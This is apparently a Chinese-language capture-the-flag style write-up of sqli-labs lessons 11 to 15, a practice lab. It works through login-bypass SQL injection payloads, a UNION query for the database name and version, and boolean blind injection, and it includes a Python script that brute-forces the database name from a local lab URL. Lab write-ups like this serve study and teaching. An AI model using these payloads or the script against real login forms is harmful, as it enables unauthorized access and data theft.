第十一題 報錯

這裡寫程式碼片

一個登陸介面

這是登陸成功

使用者名稱輸入單引號報錯

猜測是

select * from users where username='$name' and password='$password'

閉合

select * from users where username='  'or  1=1 #  ' and password='$password'

要將後面的and註釋掉 不然語句就是或者 1=1並且密碼等於這個了。

payload就是

username=’ or 1=1 #
閉合了前面對使用者名稱的判斷，註釋了後面對密碼的判斷。使用 or 或者 1=1 肯定是對的。就可以登陸成功了。

看到頁面上面有兩個顯示的使用者名稱和密碼的，但是還是要使用 order by測試下查詢了幾個資料並顯示

確實是兩個，order by 3的時候報錯。沒有第三個欄位當然就不能以第三個欄位排序了

讓其回顯資料，直接

第十二題 雙引號報錯

雙引號報錯

這個顏色真的辣眼睛

根據報錯資訊

猜測應該是 加了括號

select * from users where username=(“$username”) and password….

直接閉合 雙引號和括號

username

")or 1=1#

閉合雙引號和括號在 1=1註釋密碼~

uname=") union select
 
 database(),version()#&passwd=1

第十三題 單引號報錯

單引號報錯

閉合payload

')or 1=1 #

or (substr((select database()),1,1)='s'

可以布林盲注

payload

uname=' )or  (select substr((select database()),1,1))='s' # &passwd=1

寫個指令碼

獲取資料庫名長度

uname=' ) or length((select database()))=8 #&passwd=1

import
 
 requests
#uname=' )or  (select substr((select database()),1,1))='s' # &passwd=1
url = "http://localhost/sqli-labs/Less-13/";
name =""
database_length=0
#正確的話就存在 flag.jpg
database_length_payload = "uname=' ) or length((select database()))={0} #"
database_name_payload = "uname=' )or  (select substr((select database()),{0},1))='{1}' # &passwd=1"
def get_response(payload,value,*args):
    if len(args)==0:
        payload=payload.format(value)
        data = {'uname': payload, 'passwd': '1'}
    else:
        payload = payload.format(value,args[0])
        data = {'uname': payload, 'passwd': '1'}
    print(data)
    html = requests.post(url, data=data)
    if "flag.jpg" in html.text:
        return True
    else:
        return False
for n in range(100):
    if get_response(database_length_payload,n):
        print("[+] database_length is {0}".format(n) )
        database_length=n
        break
for nn in range(1,database_length+1):
    for v in "qwertyuioplkjhgfdsazxcvbnm":
        if get_response(database_name_payload,nn,v):
            name =name+v
            print("[+] database name is {0}".format(name))
            break
print("[*] database name is {0}".format(name))

第十四題 雙引號報錯

雙引號報錯

閉合繞過

" or 1=1 #

//寫了一堆是繞過登陸的。。。。應該獲取資料庫資訊才行~！~！！！

十四題使用十三題的去掉括號，單引號換成雙引號

修改payload直接上面的指令碼跑獲取資料庫資訊

第十五題 單引號報錯

單引號報錯，還是之前的指令碼修改 payload